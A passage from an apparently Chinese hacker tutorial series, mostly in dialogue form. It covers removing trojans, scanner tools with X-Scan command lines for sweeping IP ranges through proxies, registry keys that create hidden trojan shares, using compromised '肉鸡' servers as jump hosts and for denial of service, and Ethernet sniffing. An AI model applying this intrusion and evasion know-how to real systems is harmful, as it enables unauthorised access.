可以看出之所以冰河可以自我恢复主要靠的是C:\\WINDOWS\\SYSTEM\\Sy**plr.exe，而且冰河服务器端的编制是加密的，没法简单的通过改注册表得到或换掉。另外值得一提的是，即便你删除了这个键值，也并非平安大吉，冰河还会随时出来给你捣乱，主要因为冰河的服务端也会在c:\windows目录下生成一个叫 sy**plr.exe文件，当然这个目录会随你windows的安装目录变化而变化。



　　”这个文件名好像超级解霸啊，冰河竟然如此狠毒。”

　　”哈哈哈哈，你说的很对，也很聪明，这个文件的确很像超级解霸，但是这还是不够称得上为阴险，最为阴险的是这个文件是与文本文件相关联的，只要你打开文本，sy**plr.exe程序就会重新生成一个krnel32.exe，此时你的电脑还是被冰河控制著。而且如果你失误将sy**plr.exe程序破坏，你计算机的文本文件将无法打开。”

　　木马都会很注意自己的端口，多达六万多中的端口很容易让我们迷失其中，如果你留意的话就会发现，通常情况下木马端口一般都在1000以上，并朝着越来越大的趋势发展。这主要是因为1000以下的端口是常用端口，况且用时占用这些端口可能会造成系统不正常，木马也就会很容易暴露；此外使用大的端口也会让你比较难发现隐藏其中的木马，如果使用远程扫描端口的方式查找木马，端口数越大，需要扫描的时间也就越多，故而使用诸如8765的端口会让你很难发现隐藏在其中的木马。

　　四

　　”既然木马如此的阴险，那么前辈有何可知木马的方法啊？”

　　”现在的木马虽然阴险，但终究逃不过几个道理。平时出名的木马，杀毒软件就多数能够对付。但是现在木马种类繁多，有很多杀毒软件对付不了的。但是，只要我们谨记一下几个方法，就能够手到擒来。”

　　”首先，我们可以选择端口扫描来进行判断，因为木马在被植入计算机后会打开计算机的端口，我们可以根据端口列表对计算机的端口进行分析。此外，查看连接也是一种好办法，而且在本地机上通过netstat -a（或某个第三方的程序）查看所有的TCP/UDP连接，查看连接要比端口扫描快，而且可以直观地发现与我们计算机连接的有哪些IP地址。当然，如果你对系统很熟悉的话，也可以通过检查注册表来进行木马的杀除，但是这个方法不适合于那些菜鸟级用户。查找木马特征文件也是一种好方法，就拿冰河来说……”

　　”这个我知道前辈，木马冰河的特征文件一定是G_Server.exe。”

　　”那有这么简单。冰河植入计算机后真正的特征文件是kernl32.exe和sy**lpr.exe。”

　　”太狠毒了，一个跟系统内核文件一样，一个又像超级解霸。那么前辈我们把这两个文件删除掉，这冰河岂不就消失了。”

　　”的确，你要是在DOS模式下删除了他们，冰河就被破坏掉了，但是你的计算机随之会无法打开文本文件，因为你删除的sy**plr.exe文件是和文本文件关联的，你还必须把文本文件跟notepad关联上。修改注册表太危险，你可以在Windows资源管理器中选择查看菜单的文件夹选项，再选择文件类型进行编辑。不过最简单的方法是按住键盘上的SHIFT键的同时鼠标右击任何一个TXT为后缀的文本文件，再选择打开方式，选中〖始终用该程序打开〗，然后找到notepad一项，选择打开就可以了。”

　　”哈哈，按照前辈这么说来，我们只要抓住了这特征，天下的木马也奈何不了我们了。”

 

(本章完)

[(第11章 黑客常用兵器之木马篇（下）)]

五

　　”哈哈，你可知道除了冰河这样的木马经常使用的隐身技术外，更新、更隐蔽的方法已经出现，这就是―驱动程序及动态链接库技术。驱动程序及动态链接库技术和一般的木马不同，它基本上摆脱了原有的木马模式―监听端口，而采用替代系统功能的方法改写驱动程序或动态链接库。这样做的结果是：系统中没有增加新的文件所以不能用扫描的方法查杀、不需要打开新的端口所以不能用端口监视的方法进行查杀、没有新的进程所以使用进程查看的方法发现不了它，也不能用kill进程的方法终止它的运行。在正常运行时木马几乎没有任何的症状，而一旦木马的控制端向被控端发出特定的信息后，隐藏的程序就立即开始运作。此类木马通过改写vxd文件建立隐藏共享的木马，甚是隐蔽，我们上面的那些方法根本不会对这类木马起作用。

　　”可是前辈说的这种木马晚生并没有见到啊。”

笨蛋！你没有见过，你怎么知道我老人家也没有见过？告诉你我已经看到了一个更加巧妙的木马，它就是Share。运行Share木马之前，我先把注册表以及所有硬盘上的文件数量、结构用一个监控软件DiskState记录了起来，这个监控软件使用128bit MD5的技术来捕获所有文件的状态，系统中的任何文件的变动都逃不过他的监视，这个软件均会将它们一一指出。”

　　”前辈我这里第一次运行Share后，系统好像没有动静，使用Dllshow（内存进程察看软件）观看内存进程，似乎也没有太大的变化。一般木马都会马上在内存驻留的，或许此木马修改了硬盘上的文件。”

　　”好，那么你就接着用DiskState比较运行share.exe前后的记录。”

　　”程序显示windows\applog里面的目录的一些文件和system.dat、user.dat文件起了变化，并没有其他文件的增加和修改。”

　　”系统中的applog目录里面存放了所有应用程序函数和程序调用的情况，而system.dat和user.dat则是组册表的组成文件。你把applog目录里面的share.lgc打开来观看，它的调用过程是什么？”

　　”调用过程如下：

　　c15625a0 92110 C:\WINDOWS\SYSTEM\OLEAUT32.DLL

　　c1561d40 c1000 C:\WINDOWS\SYSTEM\OLE32.DLL

　　c1553520 6000 C:\WINDOWS\SYSTEM\INDICDLL.DLL

　　c15d4fd0 2623 C:\WINDOWS\WIN.INI

　　c15645b0 8000 C:\WINDOWS\SYSTEM\SVRAPI.DLL

　　c1554190 f000 C:\WINDOWS\SYSTEM\MPR.DLL

　　c154d180 a1207 C:\WINDOWS\SYSTEM\USER.EXE

　　c1555ef0 13000 C:\WINDOWS\SYSTEM\MSNET32.DLL

　　但是为什么前辈我们看不到MSWINSCK.OCX或WSOCK2.VXD的调用呢？如果木马想要进行网络通讯，是会使用一些socket调用的。”

　　”那么接着你再观察注册表的变化。”

　　”好像在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan下面，多了几个键值，分别是CJT_A$、CJT_C$、CJT_D$、CJT_E$、CJT_F$，其内部键值如下：

　　Flags=dword:00000302

　　Type=dword:00000000

　　Path=A:\\ 《—–路径是A到F

　　Parm2enc=hex:

　　Parm1enc=hex:

　　Remark=黑客帝国

　　”

　　”这就对了，然后你在浏览器的地址栏输入\\111.111.111.1\CJT_C$。”

　　”啊！居然把我的C盘目录文件显示出来了。”

　　”现在你把CJT_C$改成matrix然后重启计算机，接着在浏览器的地址栏输入\\111.111.111.1\matrix。”

　　”前辈也显示C盘目录文件了，很奇怪的是，在我的电脑里面硬盘看上去并没有共享啊？”

　　”哈哈，那你再把Flags=dword:00000302的302改成402，reboot计算机。”

　　”嘻嘻，硬盘共享已显示出来了。那么如何防止这种木马那？”

“哈哈哈哈，这种木马只不过用了一个巧妙的方法隐藏起来而已。你现在把HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan下面的CJT_A$、CJT_C$、CJT_D$、CJT_E$、CJT_F$全部删掉。如果你还放心不下，也可以把windows\system\下面的Vserver.vxd（Microsoft 网络上的文件与打印机共享，虚拟设备驱动程序）删掉，再把[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\下的VSERVER键值删掉。这样就可以了。另外，对于驱动程序/动态链接库木马，有一种方法可以试试，使用Windows的〖系统文件检查器〗，通过〖开始菜单〗－〖程序〗－〖附件〗－〖系统工具〗－〖系统信息〗－〖工具〗可以运行〖系统文件检查器〗，用〖系统文件检查器〗可检测操作系统文件的完整性，如果这些文件损坏，检查器可以将其还原，检查器还可以从安装盘中解压缩已压缩的文件。如果你的驱动程序或动态链接库在你没有升级它们的情况下被改动了，就有可能是木马，提取改动过的文件可以保证你的系统安全和稳定。”

　　六

　　”此外很多人中木马都会采用如下手段：

　　1．先跟你套近乎，冒充成漂亮的美眉或者其他的能让你轻信的人，然后想方设法的骗你点他发给你的木马。

　　2．把木马用工具和其它的软件捆绑在一起，然后在对文件名字进行修改，然后修改图标，利用这些虚假的伪装欺骗麻痹大意的人。

　　3．另外一种方法就是把木马伪装好后，放在软件下载站中，着收渔翁之利。

　　所以我这里提醒你一些常见的问题，首先是不要随便从小的个人网站上下载软件，要下也要到比较有名、比较有信誉的站点，通常这些网站的软件比较安全。其次不要过于相信别人，不能随便运行别人给的软件。而且要经常检查自己的系统文件、注册表、端口等，而且多注意些安全方面的信息。再者就是改掉windows关于隐藏文件后缀名的默认设置，这样可以让我们看清楚文件真正的后缀名字。最后要提醒你的是，如果有一天你突然发现自己的计算机硬盘莫名其妙的工作，或者在没有打开任何连接的情况下，猫还在眨眼睛，就立刻断线，进行木马的搜索。”

 

(本章完)

[(第12章 黑客常用兵器之扫面篇（上）)]

刀，兵器谱上排名第六。

　　刀；

　　一把好刀，光亮如雪；

　　刃；

　　一抹利刃，吹发即断；

　　黑客手中的扫描器如同刺客手中之刀，杀人、保命；攻击、补漏。

　　如果一个黑客手中没有一两个扫描器，那么他算不上是一个黑客，至少他是一个手里没有”刀”的黑客。没有”刀”的黑客是难以生存的……】

　　”前辈，您为何如此看好扫描器？为什么黑客必须要有扫描器？”

　　”后生，你上次木马害我不浅，你这次又像搞什么花样？”

　　”上次小生只是跟前辈开了一个玩笑，还望前辈见谅。”

　　”罢了，我老人家还不止于和你如此一般见识。此次你又有什么不清楚的？”

　　”我不太清楚扫描器为何会像您所说的有如此大的威力，扫描器在黑客攻击中能起到什么作用？”

　　”看来你现在也是一个手里没有刀的黑客，扫描器在一个成熟的黑客手里有着相当大的作用。因为进化到会用扫描器一级的黑客，他们就会很少有人在对那些无知的个人用户感兴趣，注意力更多的被吸引到了服务器上。而对付服务器最好的方法就是找到服务器系统的漏洞，或者服务器相关软件的漏洞。对于传统的手工查找来说，不但查找漏洞的速度过于缓慢，而且多数情况下只能针对某一个特定的漏洞，感觉有点大海捞针的味道。而扫描器就是一种快速寻找服务器系统相关漏洞的工具，通过它们，黑客可以根据自己的带宽和系统情况，以他们自己喜欢的速度和方式来快速的寻找系统漏洞，而且这多数扫描器可以同时扫描多种漏洞，很容易找到系统的漏洞和弱点，此时黑客就可以根据扫描器提供的漏洞报告和信息，采用合适的攻击方法对目标给以致命的一击。”

　　”前辈，那我如何找到扫描器，平时我好像很少接触到这些东西啊。”

　　”呵呵，你用过小榕的流光系列吗？”

　　”这个当然是接触过了。”

　　”其实小榕的流光就是一款结合强大扫描功能的软件，只不过他在流光中加入了一些攻击和破解成份。”

“扫描器果然强大，我就曾用流光攻破过许多的黄色和反动网站，特别是他的FTP和新加入的SQLCMD功能，非常的强大。而且界面非常的友好，让我这种菜鸟用户很容易上手。”

　　”你说的不错，但是虽然小榕的流光非常出色，并兼备强大的破解和攻击成份，但是总的来说它不能算的上是一个真正的扫描器。而且流光主要体现在破解，攻击性很强，没有太多的对目标系统扫描后的分析报告，所以流光在我看来只能算是是一个涵盖扫描功能的强大破解软件。”

　　”那么在前辈的眼中，什么样的软件是一个强大的扫描软件，什么样的扫描器才能成为黑客手中的屠龙刀？”

　　”一个好的扫描器必须有简洁和易于使用的操作界面，强大的分析和扫描信息范围，对最新漏洞的扫描判断能力（也就是通常所说的升级概念），详细的分析结果报告和对漏洞的描述与对策。这样的”刀”才能算的上是黑客手中的一把宝刀。”

　　”前辈能否给我点评一下如今最为流行的扫描器的特点和性能呢？”

　　”说道当今网络安全界流行的扫描器，其中最为优秀的就要算是ISS公司出品的商业扫描器了。它能针对上千种的系统和软件漏洞对服务器作出全面的细微扫描，而且能够生成比较详细的扫描报告，应该说是先进最好的扫描器了。”

　　”前辈这个扫描器我可以从什么地方下载？”

　　”无知！商业扫描器，当然是不能免费下载的了，你要花钱去买！”

　　”还需要花钱啊，哪有没有不花钱的扫描器呢？”

　　”当然有了，扫描器是黑客必备的工具之一，要是都花钱去买那不符合黑客的风格。我们可以在网上找到很多免费的而且同样很优秀的黑客扫描器。在国外比较常用的有Cerberus Internet Scanner简称CIS，还有乌克兰SATAN。我们国内的也有安全焦点的X-Scanner，与小榕的流光。”

　　”前辈说的这几种扫描器我只用过流光，我个人认为流光很出色，其他的扫描器也只有所耳闻，但不知道有什么特点，还请前辈赐教。”

　　”比起你用过的流光来说，ISS算得上是一个真正的管理员使用的系统扫描工具，首先它能扫描一些众所周知的系统漏洞和系统弱点，包括一些往往被用户忽略的问题，这些问题是一些经常被黑客利用的漏洞和弱点。ISS有更为强大的漏洞分析功能，并且它不会允许非法访问，但是实际情况是ISS已经背离了它的初衷目的。”

　　”任何好的事物都有不利的一面，更何况一把刀，而且是把宝刀。”

　　”这话不错，ISS的确是安全界最为出色的扫描器，而且他还是第一个可以公开得到的多层次扫描器。特别是它的可移植性和灵活性，众多的UNIX的平台上都可以运行ISS，ISS的扫描时间和效率也是很快的，很适合于企业级的用户。”

“前辈，我插一句话，虽然ISS足够强大，但是它毕竟不是免费的午餐，这就不符合我们的黑客精神了。您那里有没有一些强大而且免费的扫描器？”

　　”扫描器庞大的家族中怎么会没有免费的，你听说过NMAP吗？”

　　”NMAP倒是有所耳闻，以前在许多安全网站上见到过这个名字，但是我不知道它是干什么用的一个东西。”

　　”NMAP其实就是一个功能强大的扫描器。它的强大之处在于它支持UDP，TCP （connect），TCP SYN（half open），ftp proxy（bounce attack），Reverse-ident，ICMP（ping sweep），FIN，ACK sweep，Xmas Tree，SYN sweep，Null等多种扫描协议和扫描方式。但是总的来说它的最大的优点莫过于隐蔽性高，这是由于它采用的是”半开”的一种扫描方式，此外它提供的Stealth FIN，Xmas Tree与Null扫描模式更是让被扫描者难以发现。也正是因为这一点的原因，NMAP深受一些骨灰级黑客的喜爱。像一般黑客喜欢的秘密扫描、动态延迟、重发与平行扫描、欺骗扫描、端口过滤探测、RPC直接扫描、分布扫描等，NMAP均可以实现，可以说NMAP是一个灵活性很大的扫描器。通过强大系统的扫描，它还可以分析出服务器的端口处于Open状态还是被防火墙保护状态。总之它的强大是不言而喻的，如果你有一台联网的Linux或者UNIX计算机，那么你就可以去http://www.insecure.org/nmap/ 下载得到它。

 

(本章完)

[(第13章 黑客常用兵器之扫描篇（下）)]

“前辈，我的系统使用的是Windows，您能不能介绍一些我这种菜鸟级黑客也能用的扫描器？当然前提是在Windows系统下运行啊。”

　　”既然这样，我想Cerberus Internet Scanner（CIS）可能比较合适与你，它主要运行在Windows NT和Windows2000的平台下面，当然它也主要是针对微软的Windows操作系统进行探测扫描的。CIS拥有绝大多数菜鸟喜欢的Windows友好界面，而且它提供进行扫描的安全问题也是通常在Windows中经常见到的，其中包括：

　　（1） WWW服务

　　（2） FTP服务

　　（3） MS SQL Server 数据库扫描

　　（4） NetBIOS 共享扫描

　　（5） 注册表设置

　　（6） NT服务漏洞

　　（7） **TP服务扫描

　　（8） POP3服务扫描

　　（9） RPC服务扫描

　　（10） 端口映射

　　（11） Finger服务

　　（12） DNS安全扫描

　　（13） 浏览器安全等

　　在CIS中，它最为引人注目的还要数NetBIOS共享扫描。CIS能根据NetBIOS这一漏洞作出NETBIOS资源信息、共享资源、计算机用户名、工作组和薄弱的用户口令等详细的扫描分析。它的操作方法也是非常的容易，你只需要输入目标服务器的地址，然后选择你想要扫描的相关漏洞就可以进行扫描分析了。扫描完毕后他会主动生成一个HTML的报告共你分析结果。你可以在http://www.cerberus-infosec.co.uk/ 下载获得。”

“这款扫描器的功能是否太过于简单了哪？我感觉它比起前几个您说的那些扫描器，功能过于少了，而且没有流光那么有成效。”

　　”SATAN作为扫描器的鼻祖可能很适合你，由于它采用的是一个Perl的内核，通过PERL调用大量的C语言的检测工具对目标网站进行分析，所以你打开浏览器用IE方式就可以直接操作，使用也相对简单，我就不在这里介绍他浪费时间了。

　　作为黑客的利刃，国产的CGI & Web Scanner也是一个不错的扫描器，这个宝刀是由zer9设计完成打造的。这款扫描器主要是针对动态网站技术的安全问题来设计的。”

　　”动态网站？”

　　”对，动态网站。随着网站设计的日趋复杂化，网站的技术人员会利用一些诸如CGI、ASP、PHP、jsP等网站动态交互技术与相应的服务软件对网站进行开发，这些东西大大地减轻了网站的维护和更新工作量，但是也正是这些技术，导致了大量的安全问题，特别是很多网站动态第三方程序在设计之初根本就没有对安全问题考虑太多，导致了大量的系统漏洞的出现。而CGI & Web Scanner就是专门针对这些动态的网页上出现的漏洞进行扫描的一把利刃。

　　CGI & Web Scanner的主要功能有：

　　（1） 检测203个已知的CGI漏洞

　　（2） 通过HTTPD辨认服务器类型

　　（3） 有更新漏洞的功能

　　（4） Microsoft SQL Server DOS检测

　　（5） Httpd Overflow检测

　　（6） IIS Hack检测

　　（7） ASP检测

　　（8） DOT 漏洞检测

　　而且它可以多线程扫描，并对常见的D.O.S（拒绝服务攻击）和Overflow等也进行探测，很适合初级杀手作为武器。至于你关心的使用方法，就更为简单了，输入目标服务器的IP地址，选择需要扫描的漏洞种类点击扫描按键，就开始了。”

　　”没有想到国产扫描器还有如此优秀的！”

　　”这个是自然，作为黑客的必备武器之一，国产扫描器有很多优秀的作品，前面我提到的安全焦点的X-Scanner，就是我最为欣赏的扫描器，而且我老人家也时常常的使用，但是不知道为什么，在对X-Scanner进行病毒测试的时候，熊猫和KV3000都能在X-Scanner里面发现两个木马程序。这一点是我们要非常的注意的。当然也要请安全焦点的朋友做做解释工作。”

　　”前辈既然如此欣赏X-Scanner，那就给我详细介绍一下吧！”

　　”X-Scanner运行在Windows平台下，它主要针对WindowsNT/Windows 2000操作系统的安全进行全面细致评估，可以扫描出很多Windows系统流行的漏洞，并详细的指出安全的脆弱环节与弥补措施。X-Scanner采用多线程方式对指定IP地址段（或单机）进行安全漏洞扫描，支持插件功能，提供了图形界面和命令行两种操作方式。

　扫描范围包括：

　　（1）标准端口状态及端口banner信息；

　　（2）CGI漏洞；

　　（3）RPC漏洞；

　　（4）SQL-SERVER默认帐户；

　　（5）FTP弱口令；

　　（6）NT主机共享信息；

　　（7）用户信息；

　　（8）组信息；

　　（9）NT主机弱口令用户等。

　　X-Scanner会将扫描结果保存在/log/目录中，index_*.htm为扫描结果索引文件。并对于一些已知漏洞，X-Scanner给出了相应的漏洞描述，利用程序及解决方案。X-Scanner扫描的内容是绝大多数的服务器容易出现的漏洞和安全设置问题。最常用的还是其中的SQL默认帐户、FTP弱口令和共享扫描，他们能揭示出许多麻痹大意的网管犯的一些低级错误。”

　　”前辈能不能具体说说X-Scanner如何使用呢？”

　　”打开了X-Scanner，在扫描项目中可以任意的指定单独扫描哪一个特定的项目。比较多的是CGI和SQL或者FTP默认口令，这些都是很致命的服务器漏洞。”

　　”下一步需要在〖扫描设置〗中进行参数的设置。一般的情况下，只对〖运行参数〗中的扫描范围进行设置。在那里只要填写网站服务器的IP地址就可以，可以填写一个来针对某一个特定的网站或服务器，也可以填写一个IP段范围，来扫描一段IP地址上所有的计算机。具体扫描参数格式如下：

　　1.命令行：Xscan -h [起始地址]<-[终止地址]> [扫描选项]

　　 其中的[扫描选项]含义如下：

　　 -p: 扫描标准端口（端口列表可通过\dat\config.ini文件定制）；

　　 -b: 获取开放端口的banner信息，需要与-p参数合用；

　　 -c: 扫描CGI漏洞；

　　 -r: 扫描RPC漏洞；

　　 -s: 扫描SQL-SERVER默认帐户；

　　 -f: 尝试FTP默认用户登录（用户名及口令可以通过\dat\config.ini文件定制）；

　　 -n: 获取NetBios信息（若远程主机操作系统为Windows9x/NT4.0/2000）；

　　 -g: 尝试弱口令用户连接（若远程主机操作系统为Windows NT4.0/2000）；

　　 -a: 扫描以上全部内容；

-x [代理服务器:端口]: 通过代理服务器扫描CGI漏洞；

　　 -t: 设置线程数量，默认为20个线程；

　　 -v: 显示详细扫描进度；

　　 -d: 禁止扫描前PING被扫主机。

　　2.示例：

　　Xscan -h xxx.xxx.1.1-xxx.xxx.10.255 -a

　　含义：扫描XXX.XXX.1.1-XXX.XXX.10.255网段内主机的所有信息；

　　Xscan -h xxx.xxx.1.1 -n -g -t 30

　　含义：获取XXX.XXX.1.1主机的Netbios信息，并检测NT弱口令用户，线程数量为30；

　　Xscan -h xxx.xxx.1.1 -p -b -c -x 129.66.58.13:80 -v -d

　　含义：扫描xxx.xxx.1.1主机的标准端口状态，通过代理服务器129.66.58.13:80扫描CGI漏洞，检测端口banner信息，且扫描前不通过PING命令检测主机状态，显示详细扫描进度。”

　　”在〖运行参数〗中，有很大的选择余地，比如它可以设置代理服务器来躲避网管的追查，并课以设置扫描的线程。对扫描显示也可以进行详细的选择。然后扫描器就开始工作了。”

　　”好啊，我去试试。”

　　”另外我要提醒你注意的是，在使用这些扫描软件的时候一定要看清楚里面有没有可以的程序，以防自己先中了别人的招。此外，虽然你刺客手中有刀，但是现在的网站管理员也会使用这些宝刀，所以说，手中有绝世好刀，不一定就能杀死所有的敌人。好了，你去吧！”

 

(本章完)

[(第14章 代理、肉鸡、跳板的概念)]

看到有的网友还用那种8080、80端口的代理，我有话说，也可以说为大家做一点最最基础的黑客教程，大家看完自己去做吧，具体怎么做，我就不说了，可以说我把我所知道的肉鸡和跳板的概念知识全部告诉大家了，我也在几个地方发表过，这是我的原创，我要告诉大家的是真正在黑客抢劫服务器是用的跳板是什么，以及黑客们很少说的跳板知识介绍~~~~~~~~~~我有个习惯，

总是喜欢让大家看一篇文章的时候知道：为 什么要看这篇文章？这篇文章要让

自己知道或是学到什么东西，我尽量把自己所 掌握的东西尽量简化后用通俗的

语言表达。大家看完后有什么不好的地方，请指出，我好学习到新的东西，我很高兴自己能

把自己所学到的东西和大家分享，在 这里的认识的网友们有想成为黑客的；有

想随便玩玩；有的想学，但是不久就感

觉学网络安全很难就退却了。我真的很希望大家能找到自己的目标，做自己喜欢

的事情，不要一天就黑小企鹅和一天泡在别人的软件里（至少要尝试读一些简单的

代码），学习黑客知识是孤独的，必须完全靠自己的努力，很少有人能帮你的，

开始你会觉得很无助，但是慢慢的，你将习惯这种感觉和方式，要自己努力才会

有成果的，我和大家一样也在不停的探索网络知识，现在不过是把自己学到的东

西和大家分享罢了。是不是我象大姨妈啊！！呵呵~~~婆婆***！我看到很

多的网友聊代理的时候，概念很模糊，甚至搞出了笑话，所以今天我就谈谈很多

朋友初涉网安的一个

误区（认识代理、跳板、肉鸡）。有的网友说那还不简单，找个运行就能隐藏IP

的软件，我早说过了，我没有见过这种软件或许说根本不存在这种软件（懒惰的

人更勤于此道）再者对抢劫服务器者而言把自己的身家性命放在一个隐藏自己IP的软件

上是很不明智的，要知道抢劫服务器时会尝试很多的连接，在你一不小心的时候你就把

自己卖了（我曾经在一次抢劫服务器完毕后没有用sc32设置好跳板的IE，而是随手在

桌面上双击浏览器去看黑页，结果把自己给卖了，本来没有什么可怕的，但是我

们要养成做任何事都无懈可击的习惯。再者~~~嘘嘘~~还好是日本鬼子的系统

。）所以我根本不相信什么隐藏IP的软件，也许我孤陋寡闻或是真有这样的东西

，但至少我是不会用的，除非有人张罗着把我毙了，那么我可以考虑一下。

我要说此文适合菜鸟阅读，高手止步！！！

我上小企鹅，老有网友问我代理和跳板以及肉鸡是指同一类概念吗？它们怎么样工

作的？

因为在小企鹅上不可能讲很清楚，涉及的东西太多了，因为此文是面向和我一样初

人涉网络网络安全的朋友，那么我就简单的说说。

首先是代理（泛指80；8080；1080端口），很多网友认为用代理猎手设置好

端口之后就可以为自己找个代理在IE、FTP等里面设置后来隐藏IP，这就是肉鸡

或认为这就是跳板，其实不然，为什么呢？就我个人来看这样的代理简直就是垃

圾（有的网友不服气了，等等，我一会告诉你为什么我这么说），1、首先一个

速度比较慢，我用这样的代理用过很多国家，包括国内的，感觉都是其慢，没有

那种快速的感觉；2、不稳定。大家一定都想拥有一个稳定的代理吧~~~呵呵

但是这样的代理通常有原因的，不是服务器自身漏洞就是为了自身利益而增加的

服务，当他的愿望达成以后或是网管发现以后，你就不能再用了。3、多人使用。如果你

用8080、1080、80等端口的代理，我敢保证这个代理不止你一个人用，如果

你想成为一个黑客或是老手的话，拥有一个自己的代理是必须的。4、保密性。

有的代理服务器提供者很可恶，他们利用代理得知你的密码或一些敏感信息，因

为普通代理数据没有经过加密（1080端口除外），用一个嗅探器就可以知道你

输入的数据，别忘了代理的最最基本原理是数据转发哟。好了，有了以上的缺点

你还敢用或是有信心用它吗？这就是我为什么叫它垃圾的原因了。有网友会问：

那什么样的代理才没有这些缺点呢？别急，我下面就要说。

socks5.这是一个很不错的跳板软件，很小（32K）功能却是不凡，它是sock4

的接替者，原来的sock4只支持UDP协议（这个大家去看书吧，我不多说了），

而sock5支持USP和TCP两种协议，还有数据的传输是加密的所以真的很佩服作者的编程能力。如果你简

单的使用它，那你上个小企鹅啊或IRC啦，那是没有什么问题啦，而且它的速度很快

几乎和你使用本地机没有什么差别（当然不能加太多跳板），sock5支持你搭建

255个跳板，也就是你可以用skserverGUI来编辑多达255个安装了sock5的机

器来运行达到你隐藏IP的目的，但我想如果我看见有人这样做的话，我会马上打

电话到精神病院~~~：）而且用sc32来配合skserverGUI的话，那么你的电脑

几乎就没有应用程序不能用代理的。你用过之后一定会说：我喜欢！我选择！sock5的安装也很简单，在此软件的说明书里有，因为我主要是让大家了解代理——&g*;跳板——&g*;肉鸡的简单原理；再者因为制作这样的跳板或肉鸡很有攻击性（会构成非法使用

他人电脑），而且网上有很多人不自觉，我可不想以后有人被抓了，说我

曾经为他的犯罪生涯做过贡献。

好了！最后我们来说说肉**

肉鸡是什么？在小企鹅上也有朋友问我，我认为这是中国黑客对自己开了后门的服

务器为将来自己做一些事时使用的机器的一种自豪而又亲切的叫法.肉鸡是老手

常用的代理，也就是*elne*的那种，完全是靠自己制作的，端口加密码啦！绝对

只有你一个人用，当然被别人提前下手的话，那你就清除它的后门就可以了，当

你第一次拥有这种服务器的时候你的心情是什么样的？我个人感觉是象初恋一样

。

有3389肉鸡通常可以图形化*作，从而发动拒绝服务攻击，那么我们用什么样

系统的肉鸡呢？~~~~恩！marke这个

问题问的很好~~：）

我喜欢用windows 2000和linux，虽然我一直采用WIN 2000但是告诉大家一个

好消息我刚刚拥有了自己第一台LINUX肉鸡，对我这个正在学习LINUX的家伙来

说，没事到上面熟悉一下LINUX指令是件很愉快的事。要想学用这种肉鸡必须熟

练DOS指令（指windows），因为没有图形界面让你玩的。做一个黑客必须适应字符化的*作

当你*elne*到一台你服务器里（肉鸡）

你就可以踏雪无痕了，就象”信息公路牛崽”（抢劫服务器五角大楼的美国天才黑客）一

样先连接到日本、到中东、再绕回美国本土抢劫服务器五角大楼，听上去很神秘吧，其

实用的原理就是这个。

 

(本章完)

[(第15章 网络监听概念)]

网络监听工具的提供给管理员的一类管理工具。使用这种工具，可以监视网络的状态、数据流动情况以及网络上传输的信息。

　　但是网络监听工具也是黑客们常用的工具。当信息以明文的形式在网络上传输时，便可以使用网络监听的方式来进行攻击。将网络接口设置在监听模式，便可以源源不断地将网上传输的信息截获。

　　网络监听可以在网上的任何一个位置实施，如局域网中的一台主机、网关上或远程网的调制解调器之间等。黑客们用得最多的是截获用户的口令。

　　什么是网络监听

　　网络监听是黑客们常用的一种方法。当成功地登录进一台网络上的主机，并取得了这台主机的超级用户的权限之后，往往要扩大战果，尝试登录或者夺取网络中其他主机的控制友。而网络监听则是一种最简单而且最有效的方法，它常常能轻易地获得用其他方法很难获得的信息。

　　在网络上，监听效果最好的地方是在网关、路由器、防火墙一类的设备处，通常由网络管理员来操作。使用最方便的是在一个以太网中的任何一台上网的主机上，这是大多数黑客的做法。

以太网中可以监听的原因

　　在电话线路和无线电、微波中监听传输的信息比较好理解，但是人们常常不太理解为什么局域网中可以进行监听。甚至有人问：能不能监听不在同一网段的信息。下面就讲述在以太网中进行监听的一些原理。在令牌环中，道理是相似的。

　　对于一个施行网络攻击的人来说，能攻破网关、路由器、防火墙的情况极为少见，在这里完全可以由安全管理员安装一些设备，对网络进行监控，或者使用一些专门的设备，运行专门的监听软件，并防止任何非法访关。然而，潜入一台不引人注意的计算机中，悄悄地运行一个监听程序，一个黑客是完全可以做到的。监听是非常消耗CPU资源的，在一个担负繁忙任务的计算机中进行监听，可以立即被管理员发现，因为他发现计算机的响应速度令人惊奇慢。

　　对于一台连网的计算机，最方便的是在以太网中进行监听，只须安装一个监听软件，然后就可以坐在机器旁浏览监听到的信息了。

　　以太网协议的工作方式为将要发送的数据包发往连在一起的所有主机。在包头中包含着应该接收数据包的主机的正确地址。因此，只有与数据包中目标地址一致的那台主机才能接收信包。但是，当主机工在监听模式下，无论数据包中的目标物理地址是什么，主机都将接收。

　　在Internet上，有许多这样的局域网。几台甚至十几台主机通过一条电缆一个集线器连在一起。在协议的高层或用户看来，当同一网络中的两台主机通信时，源主机将写有目的主机IP地址的数据包发向网关。但是，这种数据包并不能在协议栈的高层直接发送出去。要发送的数据包必须从TCP/IP协议的IP层交给网络接口，即数据链路层。

　　网络接口不能识别IP地址。在网络接口，由IP层来的带有IP地址的数据包又增加了一部分信息：以太帧的帧头。在帖头中，有两个域分别为只有网络接口才能识别的源主机和目的主机的物理地址，这是一个48位的地址。这个48位的地址是与IP地址对应的。也就是说，一个IP地址，必然对应一个物理地址。对于作为网关的主机，由于它连接了多个网络，因此它同时具有多个IP地址，在每个网络中，它都有一个。发向局域网之外的帧中携带的是网关的物理地址。

在以太网中，填写了物理地址的帧从网络接口中，也就是从网卡中发送出去，传送到物理的线路上。如果局域网是由一条粗缆或细缆连接机而成，则数字信号在电缆上传输，信号能够到达线路上的每一台主机。当使用集线器时，发送出去的信号到达集线器，由集线器再发向连接在信线器上的每一条线路。于是，在物理线路上传输的数字信号也能到达连接在集线器上的每一主机。

　　数字信号到达一台主机的网络接口时，在正常情况下，网络接口读入数据帧，进行检查，如果数据帧中携带的确良物理地址是自己的，或者物理地址是广播地址，则将数据帧交给上层协议软件，也就是IP层软件，否则就将这个帧丢弃。对于每一个到达网络接口的数据帧，都要进行这个过程。然而，当主机工作在监听模式下，则所有的数据帧都将被交给上层协议软件处理。

　　局域网的这种工作方式，一个形象的例子是，大房间就像是一个共享的信道，里面的每个人好像是一台主机。人们所说的话是信息包，在大房间中到处传播。当我们对其中某个人说话时，所有的人都能听到。但只有名字相同的那个人，才会对这些话语做出反映，进行处理。其余的人听到了这些谈话，只能从发呆中猜测，是否在监听他人的谈话。

